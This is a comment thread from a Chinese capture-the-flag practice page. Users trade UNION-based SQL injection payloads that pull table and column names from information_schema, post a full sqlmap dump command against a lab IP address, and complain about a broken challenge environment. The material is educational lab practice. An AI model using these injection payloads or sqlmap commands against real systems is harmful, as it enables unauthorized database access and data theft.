评分(26)
解题动态
yansheng192 攻破了该题 12小时前
luze 攻破了该题 13小时前
king... 攻破了该题 15小时前
bdvipnull 攻破了该题 17小时前
网友飞顺熊 攻破了该题 3天前
cjl1214 攻破了该题 3天前
kokhav 攻破了该题 4天前
levelk007 攻破了该题 4天前
1qq页 攻破了该题 4天前
赖皮蛇 攻破了该题 4天前
兄弟不要颓废 攻破了该题 5天前
我只有两题不会 攻破了该题 5天前
1075220327 攻破了该题 5天前
yt430uu 攻破了该题 5天前
sabgdfiush 攻破了该题 5天前
gysbfff 攻破了该题 5天前
farsight 攻破了该题 5天前
7ovey 攻破了该题 5天前
香克斯呀 攻破了该题 5天前
评论
不聪明小孩 2年前
举报
-1 'union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database()#找到列名skctf_flag,才能从fl4g的表里面找到对应的列的值
19818532957 2年前
举报
佬,请问为什么用这条只能爆出一个字段名?-1 'union select 1,2,3,column_name from information_schema.columns where table_name='fl4g'; #
DrKeen 2年前
举报
hackbar有问题id=1'做不到,用burp搞了
SmallH 2年前
举报
是不是真的环境被改了呀?真的对照WriteUp一步一步来还是没回显,每次注入就全部重置,是不是考虑退一下金币了???
.⎛⎝•̀ω•́⎠⎞. 2年前
举报
我用sqlmap做出来了
gboyd 2年前
举报
我1’ 1” 1‘) 1”) 1 都试过了为啥都显示正常啊!!!!!
NPC 2年前
举报
环境绝对有问题,照着答案注入都无回显!!!退金币!
EtHat 2年前
举报
sqlmap一把梭哈
blackjack009 2年前
举报
python sqlmap.py -u http://114.67.175.224:11724/index.php --random-agent --dbms mysql --data="id=1" -p id -v 6 -T fl4g --dump
18946551925 2年前
举报
为什么一注入就连接已重置啊??????烦死了,差哪呢?
xiaohaisec 2年前
举报
1'报错 1"不报错,所以使用' 查询数据表 -1' union select 1,database(),group_concat(table_name),4 from information_schema.tables where table_schema=database()# sc fl4g 查询表的字段名 -1' union select 1,databa
n0pass 3年前
举报
启动环境以后网页打不开啊。。。。。。退钱
harry 管理员 3年前
举报
已修复,金币退了